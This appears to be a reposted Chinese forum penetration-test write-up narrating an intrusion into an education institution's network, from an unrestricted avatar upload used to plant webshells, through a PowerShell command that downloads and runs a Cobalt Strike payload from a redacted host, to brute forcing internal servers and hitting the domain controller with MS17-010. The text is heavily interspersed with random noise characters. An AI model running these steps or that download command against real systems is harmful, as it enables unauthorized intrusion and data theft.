|
' [; A# s; V0 v* l1 ], s L N& ` 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
% N- ?$ G- O2 b% ^8 [7 g, }
$ X/ D" k( |! v" a( @; p8 g/ Z: D' n/ L8 f6 b
- [+ w# y: ~+ ?* l& B6 y
) G: r. c3 L8 T8 [* G4 q: K7 G3 G9 h8 A6 a6 {# u
正文
2 M% q5 L- {0 {: }7 F1 T
5 |* u9 b2 r9 O; H* L& l6 y+ i3 e- ~1 b, p; K
0 A! R3 B! D Y# O, [ ' E9 {4 A# Y3 V1 i. T( B
! k0 t8 q# v. b. [
目标:www.xxxx.com(一家教育机构) ' t! v- X! r v" r
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 [1 ^, F" q" E* U 3 j9 m+ d/ ]- B- n
( i0 _( c* S. ]* R7 I
6 z+ j0 a a# [. k: L
4 ^3 x; l2 \; e: @6 @- S& m7 N9 o0 ~& R
进行了简单的信息搜集 , L. q7 D M _3 l
& n! X* ]6 _" Y8 N9 M G
& m: _+ m- x" m3 f , C) N, V9 Z2 R
. U3 \, Y3 B% }3 ?
子域名搜集
7 x) h5 u5 r" _ 7 o8 Z3 Z! R2 R, j% P: C
- o8 ]' g+ H' p1 Q2 X
3 s0 `9 w1 w/ c# T* g5 L
* Z6 G" b- q4 y( ~. |& C
' u6 x3 a" p; d fofa找资产
; _4 E0 ~; Y# F ( S/ r, n0 v) v- H( D! }2 Q6 {2 i
: U( ?" [& C& G' y: J8 G8 I
& {( h; P2 H8 l9 E( @- X$ L4 `) n9 `2 X' |% _
% w, b2 T- f; F. |# `) g6 _) K
7 }7 S6 d- T* S& p
6 ?- ~1 Z6 r" {" f$ t" ^5 G1 z" c
一共七个资产。去重之后只有两个。 * t0 B0 t. ?# A Z: B& Z
9 }8 k: _1 G) ^7 r6 v1 Y
1 P$ @* U4 a5 x, r" w' I ) v- Q9 Y8 v8 y( Y/ H
]! X @, q' T, B 目录探测
7 V0 S* p e" d! D) M: ` / _9 q% x: i" a0 {- M& K
/ |% z% I, m9 e* k2 g / j$ L! H0 w- Q4 Y1 p/ K
5 F5 o6 E5 g- u8 y; L( O$ k
6 o( r& A9 D2 e
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 9 U; }; A. s7 m. F, J* Y- ?. a. @
/ C, q N1 h1 N, @ o( _0 r; B& W& t; v
# Q | `' Y- `! K
6 Z4 L( H. b& s# \" l# l
我又尝试了通过修改返回包来绕过登录界面
; ] I" a% v; w" L( [ ]# y3 f( q
* I0 B* T0 |( Z0 a3 ]6 R6 v+ a/ R# a+ V5 ~- }( B. ^9 R
4 \4 Q) @) b. I- h; z n
! e- ? z/ j& x) G7 H- T% I! N/ a+ X W* ^4 b) r; T; t$ U. I' `& x
还是不行,尝试注入无果/ V- W1 M9 `8 }
- T* W, L) c$ m d9 w' ]- v# |/ u" l2 F8 {1 u. h
; B, X0 H8 c% t! u) G1 W Q, ]
+ W& ~7 u9 [4 n- a+ ^
5 v1 O% t7 c6 ? 不过我目录探测出了一处Spring信息泄露 5 C/ R" @. x) `; S9 x, H* }: {
4 {5 g3 ?* P9 y1 M$ |0 _; E# Z; Q
- t5 @! G0 B, A8 C/ T
* J4 g" t. v/ E- i
4 V6 f) ~5 C& E2 E ; ^1 m4 C3 q5 [. T, E) a+ ]3 H& e
$ n& h6 F2 o4 [% U! ]3 p, c$ F' O* J 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
% P y3 f( N8 b. G+ N- {6 A( g : e9 Y- b% t; E
6 N" m/ k; n8 A( W0 y
3 `$ `5 y9 h1 H( T# O: a5 Y
( L, C3 ?; T* d* [& ]6 U0 n1 m
t+ Z- C8 |$ z* ~
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
6 i& e8 s0 G: _& V: C" Z , Y' I; u1 V- D- ?" l I
/ D# Q, k3 N4 H+ Q, ~/ v
3 y& ~, F: K+ l1 z& s/ N
/ }# L) C4 ~ b. ^ y+ k
5 X8 O1 U. {2 c& V/ P 获取有些师傅到这一步就手机抓包电脑测了。' f+ n, o( ]" F: o Q e. O
8 M B. h: @* l9 U; t4 N) z: y! ~
# B6 _% p$ s& j% j, s5 C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
7 _1 p) U) O* e- L0 \" N- [ U; M
5 M5 E9 ~$ P2 t8 [6 n" ?0 i2 }6 R. g
其中在一个公众号发现了小程序,可以进行注册。, y" j* e$ R; s% f1 U
\3 o& t0 ]6 e( D
' }; B% V; k, @* h
看到了头像上传,尝试上传获取WebShell
o0 T8 f' W" j, X3 B3 f. i1 \
+ o" H0 T" N+ ]5 t. L4 b8 }
5 ~$ o1 t% }0 l9 C0 | G3 E+ R 8 |7 E8 L$ H7 D
1 p. y1 q6 m5 E5 t% z
7 ?$ C* g6 P+ A. e 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
; }. }) {" |8 c; `
1 k) s% _8 X$ f# W0 n% P1 f, U0 A3 F( u
* g& r8 H0 h. F / j# R$ H2 D' L8 U7 a
/ Y$ K* o8 E$ C: l [% P6 U8 k: ^& P
$ _. D j* X" U3 I5 H
然后上了大马; P4 q: \! k' |; C% l" R
7 u' o4 I7 t2 E7 M" i. Q, V' o6 F( E5 X9 }0 _/ t) }) P) f, N
. a! W; ]# N: x: M4 e 0 j u) e) D6 o; A
. K( D+ T. a9 C2 Y6 M' |# G
' D1 _) ^* Y! x; N6 W8 K+ ?1 W, J 9 X# @4 }* M1 L+ F$ G
& y1 y8 E3 Q1 O2 z
通过翻找文件发现数据库账号密码5 [' f( [* y2 w- ?4 R) q( F- r, H
7 `0 C* l+ H2 D/ R |% D+ R1 j) _& I3 {$ S# M3 J
8 K2 X: ?6 i7 ]- E; ~' s: W7 c R) j
4 W: v, K' I7 b9 t2 c9 d" `1 ^2 a! } S" w
--内网渗透
0 U. k+ ^! S b" ~* R
2 b4 V' I+ U$ R" i e% l* k. u, d
直接通过powershell执行 cs上线
0 n9 N( m: n) T, |; P$ T
6 M; u/ x8 _ ^$ m" ?. W
. Z; ^. b7 g8 } powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"/ z5 k9 q1 U' q: K
7 q9 C3 t' Q/ }' [0 ?9 w! j) N0 B
* `; h5 i% T& M6 I
2 A8 y. e' G8 w7 h" G$ P& s$ b8 g
, J4 n: @9 W1 N3 l6 W) B/ t
3 s" I: q0 G, L& K0 O) Q 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
; W2 J; |# L% B. J
, {/ P7 K$ k+ N* `: w& \& @/ z
) Y( g7 c5 j' a( G1 Y
6 J! W. f' o5 ^) i, k $ w/ A) Z. |+ N. j( P1 j& d& k0 S
1 t% k* S9 }1 z! k# P F9 i 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, l0 T, I8 e+ `8 K
8 X* o9 W2 Q5 l8 I5 L0 K! H5 s - r* b, T: D& w- u& p9 x- d) t
7 I) }2 X# u6 m* z
" r; v) p l2 r8 E, ? G W2 T
) X: I" Z f# c& S. A + {- E0 F9 Z. }, G- p" H2 _
( ?. Y% L- |4 T# V0 }! I$ q$ u
7 I8 D3 N( n4 v: \, M# u 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 6 T9 b% G, S0 c1 b) y4 c
2 a/ d% z" E v+ h4 s1 w) D7 v
% X5 R5 v, j, M' ~; [5 k
% f: y) b) L2 E: ]: ^+ l/ T
9 a/ w9 D+ w1 P8 K5 w
4 C. Q& k3 |* n( o/ I
* m# O& d# [& y, L, {7 {% s" ^" [" z0 d1 I8 ? d
8 o2 ]9 N0 F2 X$ G. T( M
1 p: n* s0 Q- ^3 e9 e3 z
# C7 d9 k4 A/ H
7 S" J9 z/ G1 k- X4 M7 l0 t
' @6 Y* ]6 g5 b+ O$ p1 M
# e, b; [, c0 V: P
5 S, @' ]; C9 E& T, F1 [) `6 m; o2 A" @5 w: S; o! ?
小结
" ]- A' N I2 k4 n3 y ) ?! e, U( l1 f6 T7 L
: O( Y: a+ ~# t8 b
" N5 f- E2 }( D3 c5 V q
, C8 ~2 ~ {, U& C( Z
: Q. ]/ _* L4 I- {6 ~4 M 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
" X2 U0 c9 m9 E5 D$ p. C
6 Z$ f# R! }8 B& t8 Q1 L% x4 ~; @! Q2 _" R8 K, A- D- n7 i
6 @4 E: s4 Y( Q9 C : q" R# f9 b, ?& s$ ?, q# L
. Q5 n }6 H3 d& A
-
' i5 p" e" |; w- S u 6 o7 o. S7 u, V9 }2 R! y7 _
. G n; g5 X5 W5 `; t' O - 4 Z# L" H& c9 t
3 Z" i! ?. ~ Y! e, \' l
3 U( a+ C4 M. |. W3 B* X
& I. ?3 F2 u3 w
4 d( E# j6 e* u* z$ S 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html! \: k8 p( t% Z0 @0 ^# C% p
& T4 L2 P/ t+ s" U2 q) x* ~: X* X( F/ w( C0 c f/ g9 S. m6 q9 r
3 W% U, i! B# X3 \2 e |